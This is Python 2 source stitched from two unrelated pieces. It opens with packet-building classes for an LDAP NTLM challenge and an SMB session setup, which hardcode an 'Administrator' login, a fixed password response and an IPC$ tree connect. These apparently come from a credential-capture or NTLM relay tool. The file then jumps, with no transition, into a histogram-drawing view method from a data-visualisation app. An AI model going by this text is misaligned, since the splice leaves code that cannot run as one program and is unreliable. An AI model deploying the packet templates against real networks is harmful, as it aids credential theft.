("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"),
("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", "SERVER2008"),
("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", "smb12.local"),
("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"),
("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", "SERVER2008.smb12.local"),
("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"),
("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", "smb12.local"),
("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"),
("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"),
])
def calculate(self):
##Convert strings to Unicode first...
self.fields["NTLMSSPNtWorkstationName"] = self.fields[
"NTLMSSPNtWorkstationName"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
###### Workstation Offset
CalculateOffsetWorkstation = str(
self.fields["NTLMSSPSignature"]
) + str(self.fields["NTLMSSPSignatureNull"]) + str(
self.fields["NTLMSSPMessageType"]
) + str(self.fields["NTLMSSPNtWorkstationLen"]) + str(
self.fields["NTLMSSPNtWorkstationMaxLen"]
) + str(self.fields["NTLMSSPNtWorkstationBuffOffset"]) + str(
self.fields["NTLMSSPNtNegotiateFlags"]
) + str(self.fields["NTLMSSPNtServerChallenge"]) + str(
self.fields["NTLMSSPNtReserved"]) + str(
self.fields["NTLMSSPNtTargetInfoLen"]) + str(
self.fields["NTLMSSPNtTargetInfoMaxLen"]
) + str(
self.fields["NTLMSSPNtTargetInfoBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionHigh"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
###### AvPairs Offset
CalculateLenAvpairs = str(
self.fields["NTLMSSPNTLMChallengeAVPairsId"]
) + str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"]
) + str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"]
) + str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"]) + (
self.fields["NTLMSSPNTLMChallengeAVPairs2Id"]
) + str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs3Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs5Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"]) + (
self.fields["NTLMSSPNTLMChallengeAVPairs6Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
###### LDAP Packet Len
CalculatePacketLen = str(self.fields["MessageIDASNID"]) + str(
self.fields["MessageIDASNLen"]
) + str(self.fields["MessageIDASNStr"]) + str(
self.fields["OpHeadASNID"]
) + str(self.fields["OpHeadASNIDLenOfLen"]) + str(
self.fields["OpHeadASNIDLen"]) + str(self.fields["Status"]) + str(
self.fields["StatusASNLen"]) + str(
self.fields["StatusASNStr"]) + str(
self.fields["MatchedDN"]) + str(
self.fields["ErrorMessage"]) + str(
self.fields["SequenceHeader"]) + str(
self.fields["SequenceHeaderLen"]) + str(
self.fields["SequenceHeaderLenOfLen"]
) + CalculateOffsetWorkstation + str(
self.fields["NTLMSSPNtWorkstationName"]
) + CalculateLenAvpairs
OperationPacketLen = str(self.fields["Status"]) + str(
self.fields["StatusASNLen"]
) + str(self.fields["StatusASNStr"]) + str(
self.fields["MatchedDN"]) + str(self.fields["ErrorMessage"]) + str(
self.fields["SequenceHeader"]
) + str(self.fields["SequenceHeaderLen"]) + str(
self.fields["SequenceHeaderLenOfLen"]
) + CalculateOffsetWorkstation + str(
self.fields["NTLMSSPNtWorkstationName"]) + CalculateLenAvpairs
NTLMMessageLen = CalculateOffsetWorkstation + str(
self.fields["NTLMSSPNtWorkstationName"]) + CalculateLenAvpairs
##### LDAP Len Calculation:
self.fields["ParserHeadASNLen"] = struct.pack(">i",
len(CalculatePacketLen))
self.fields["OpHeadASNIDLen"] = struct.pack(">i",
len(OperationPacketLen))
self.fields["SequenceHeaderLen"] = struct.pack(">B",
len(NTLMMessageLen))
##### Workstation Offset Calculation:
self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack(
"<i", len(CalculateOffsetWorkstation))
self.fields["NTLMSSPNtWorkstationLen"] = struct.pack(
"<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack(
"<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
##### IvPairs Offset Calculation:
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack(
"<i",
len(CalculateOffsetWorkstation +
str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack(
"<h", len(CalculateLenAvpairs))
self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack(
"<h", len(CalculateLenAvpairs))
##### IvPair Calculation:
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
class SMBSessionTreeData(Packet):
fields = OrderedDict([
("Wordcount", "\x0d"),
("AndXCommand", "\x75"),
("Reserved", "\x00"),
("Andxoffset", "\x7c\x00"),
("Maxbuff", "\x04\x11"),
("Maxmpx", "\x32\x00"),
("Vcnum", "\x00\x00"),
("Sessionkey", "\x00\x00\x00\x00"),
("AnsiPassLength", "\x18\x00"),
("UnicodePassLength", "\x00\x00"),
("Reserved2", "\x00\x00\x00\x00"),
("Capabilities", "\xd4\x00\x00\x00"),
("Bcc", "\x3f\x00"),
("AnsiPasswd",
"\xe3\xa7\x10\x56\x58\xed\x92\xa1\xea\x9d\x55\xb1\x63\x99\x7f\xbe\x1c\xbd\x6c\x0a\xf8\xef\xb2\x89"
),
("UnicodePasswd",
"\xe3\xa7\x10\x56\x58\xed\x92\xa1\xea\x9d\x55\xb1\x63\x99\x7f\xbe\x1c\xbd\x6c\x0a\xf8\xef\xb2\x89"
),
("Username", "Administrator"),
("UsernameTerminator", "\x00\x00"),
("Domain", "SMB"),
("DomainTerminator", "\x00\x00"),
("Nativeos", ""),
("NativeosTerminator", "\x00\x00"),
("Lanmanager", ""),
("LanmanagerTerminator", "\x00\x00\x00"),
("Wordcount2", "\x04"),
("Andxcmd2", "\xff"),
("Reserved3", "\x00"),
("Andxoffset2", "\x06\x01"),
("Flags", "\x08\x00"),
("PasswordLength", "\x01\x00"),
("Bcc2", "\x19\x00"),
("Passwd", "\x00"),
("PrePath", "\\\\"),
("Targ", "CSCDSFCS"),
("IPC", "\\IPC$"),
("TerminatorPath", "\x00\x00"),
("Service", "?????"),
("TerminatorService", "\x00"),
])
def calculate(self):
##Convert first
self.fields["Username"] = self.fields["Username"].encode('utf-16be')
self.fields["Domain"] = self.fields["Domain"].encode('utf-16be')
self.fields["Nativeos"] = self.fields["Nativeos"].encode('utf-16be')
self.fields["Lanmanager"] = self.fields["Lanmanager"].encode(
'utf-16be')
self.fields["PrePath"] = self.fields["PrePath"].encode('utf-16le')
self.fields["Targ"] = self.fields["Targ"].encode('utf-16le')
self.fields["IPC"] = self.fields["IPC"].encode('utf-16le')
##Then calculate
data1 = str(self.fields["AnsiPasswd"]) + (
self.fields["UnicodePasswd"]) + str(self.fields["Username"]) + str(
self.fields["UsernameTerminator"]) + str(
self.fields["Domain"]) + str(
self.fields["DomainTerminator"]) + str(
self.fields["Nativeos"]) + str(
self.fields["NativeosTerminator"]) + str(
self.fields["Lanmanager"]) + str(
self.fields["LanmanagerTerminator"])
data2 = str(self.fields["Passwd"]) + str(self.fields["PrePath"]) + str(
self.fields["Targ"]) + str(self.fields["IPC"]) + str(
self.fields["TerminatorPath"]) + str(
self.fields["Service"]) + str(
self.fields["TerminatorService"])
self.fields["Bcc"] = struct.pack("<h", len(data1))
self.fields["Bcc2"] = struct.pack("<h", len(data2))
self.fields["Andxoffset"] = struct.pack("<h", len(data1) + 32 + 29)
self.fields["AnsiPassLength"] = struct.pack(
"<h", len(str(self.fields["AnsiPasswd"])))
self.fields["UnicodePassLength"] = struct.pack(
"<h", len(str(self.fields["UnicodePasswd"])))
self.fields["PasswordLength"] = struct.pack(
"<h", len(str(self.fields["Passwd"])))
class Eth2(Packet):
fields = OrderedDict([
("DstMac", ""),
("SrcMac", ""),
("Type", "\x08\x00"), #IP
])
def view(self, tables):
""" The view method of this module draws the control panel and the histograms.
We need at least one input to be able to draw something.
"""
if not tables:
return View(self, 'No tables to show.')
self.widgets.color.guess_or_remember(('histogram text', tables),
['name'])
self.widgets.text.guess_or_remember(('histogram colors', tables),
['name'])
self.widgets.shift.guess_or_remember(('histogram shift', tables),
'0.2')
self.widgets.sort_inside.guess_or_remember(
('histogram sort inside', tables), ['similarity'])
self.widgets.sort_outside.guess_or_remember(
('histogram sort outside', tables), ['sort'])
self.widgets.trim.guess_or_remember(('histogram trim', tables), ['no'])
self.widgets.trim_thresh.guess_or_remember(
('histogram trim thresh', tables), '0')
sort_inside_options = [('unsort', 'Keep original order'),
('similarity', 'Put similar curves together')]
sort_inside_options += [(x, 'Sort by %s' % x)
for x in tables[0].tags.keys()]
# Create the control panel view. This will enable users to choose the dimensions.
control_panel_view = stack_lines(
self.widgets.dims.view('Dimension', self.widgets.apply,
options_from_table(tables[0])),
self.widgets.text.view('Text by', self.widgets.apply,
tables[0].tags.keys()),
self.widgets.color.view('Color by', self.widgets.apply,
tables[0].tags.keys()),
self.widgets.shift.view('Shift for multiple curves',
self.widgets.apply),
self.widgets.sort_inside.view('Curve sorting',
self.widgets.apply,
sort_inside_options,
multiple=False),
self.widgets.sort_outside.view(
'Plot sorting',
self.widgets.apply,
[('sort', 'Put plots with many differences first'),
('unsort', 'Keep original order')],
multiple=False),
self.widgets.trim.view(
'Trim plots',
self.widgets.apply,
[('yes', 'Convert values lower than threshold to 0'),
('no', 'Don\'t trim')],
multiple=False),
self.widgets.trim_thresh.view('Trim threshold',
self.widgets.apply),
self.widgets.apply.view())
main_views = []
shift = self.widgets.shift.value_as_float()
plots_for_legend = OrderedDict()
colorer = axes.Colorer()
# Check that the user has already chosen dimensions. Otherwise, ask him
# to do so.
if self.widgets.dims.values.choices:
timer = MultiTimer(len(self.widgets.dims.values.choices))
for i, dim in enumerate(self.widgets.dims.values.choices):
try:
# Go over every dimension and create the histogram:
# First create a new figure:
fig = self.create_and_adjust_figure(tables)
ax = fig.add_subplot(111)
# Draw the histogram for every input
plots = []
sorted_tables = tables
sort_method = self.widgets.sort_inside.values.choices[0]
if sort_method == 'unsort':
sorted_tables = tables
elif sort_method == 'similarity':
thresh = None
if self.widgets.trim.get_choices()[0] == 'yes':
thresh = self.widgets.trim_thresh.value_as_float()
# get distances table:
distances = datatable.ks_distances(tables, dim, thresh)
# sort by distance
sorted_tables = greedy_distance_sort(distances, tables)
else:
# we need to sort by tags:
tag_for_sort = self.widgets.sort_inside.values.choices[
0]
sorted_tables = sorted(
tables, key=lambda table: table.tags[tag_for_sort])
for i, table in enumerate(sorted_tables):
color_tags = self.widgets.color.values.choices
color_key = tuple([table.tags[c] for c in color_tags])
min_x = None
if self.widgets.trim.get_choices()[0] == 'yes':
min_x = self.widgets.trim_thresh.value_as_float()
plot = axes.kde1d(ax,
table,
dim,
color=colorer.get_color(color_key),
min_x=min_x,
shift=shift * i)
plots_for_legend[color_key] = plot
# Add ticks with table names:
if self.widgets.shift.value_as_float() > 0:
ax.set_yticks(np.arange(0, len(tables) * shift, shift))
ax.set_yticklabels([
t.get_tags(self.widgets.text.values.choices)
for t in sorted_tables
],
size='xx-small')
# set axes y range:
ax.set_ylim(bottom=-0.1,
top=0.8 + shift * (len(sorted_tables) - 1))
# Make sure we don't create the same widget twice. We create a new widget
# for every dimension asked.
widget_key = self._normalize_id(dim)
if not widget_key in self.widgets:
self._add_widget(widget_key, Figure)
figure_widget = self.widgets[widget_key]
if len(tables) > 1:
from scipy.stats import ks_2samp
ks, p_ks = ks_2samp(tables[0].get_cols(dim)[0],
tables[1].get_cols(dim)[0])
ks_view = View(self,
'ks: %.3f, p_ks: %.10f' % (ks, p_ks))
final_view = stack_lines(ks_view,
figure_widget.view(fig))
else:
ks, p_ks = 0, 0
final_view = figure_widget.view(fig)
# Add the new widget's view
main_views.append((ks, p_ks, final_view))
except Exception as e:
logging.exception('Exception when drawing histogram')
main_views.append((0, 0, View(self, str(e))))
timer.complete_task(dim)
# sort by the ks test:
main_views = sorted(main_views, key=itemgetter(0), reverse=True)
main_views = [v[2] for v in main_views]
# create legend:
legened_titles = plots_for_legend.keys()
print len(legened_titles)
max_title_len = max([len(str(t)) for t in legened_titles] + [0])
print max_title_len
WIDTH_PER_LETTER = 7
EXTRA_WIDTH = 60
HEIGHT_PER_LINE = 30
EXTRA_HEIGHT = 50
MIN_X = 300
MIN_Y = 100
legend_x = max(MIN_X,
EXTRA_WIDTH + WIDTH_PER_LETTER * max_title_len)
legend_y = max(
MIN_Y, EXTRA_HEIGHT + HEIGHT_PER_LINE * len(legened_titles))
fig = axes.new_figure(legend_x, legend_y)
ax = fig.add_subplot(111)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
ax.legend(plots_for_legend.values(),
plots_for_legend.keys(),
loc='center',
mode='expand',
frameon=False,
prop={'size': 'xx-small'})
main_views = [self.widgets.legend_figure.view(fig)] + main_views
main_view = view.stack_left(*main_views)
else:
main_view = View(None, 'Please select dimensions')
# combine the control panel and the main view togeteher:
return self.widgets.layout.view(main_view, control_panel_view)
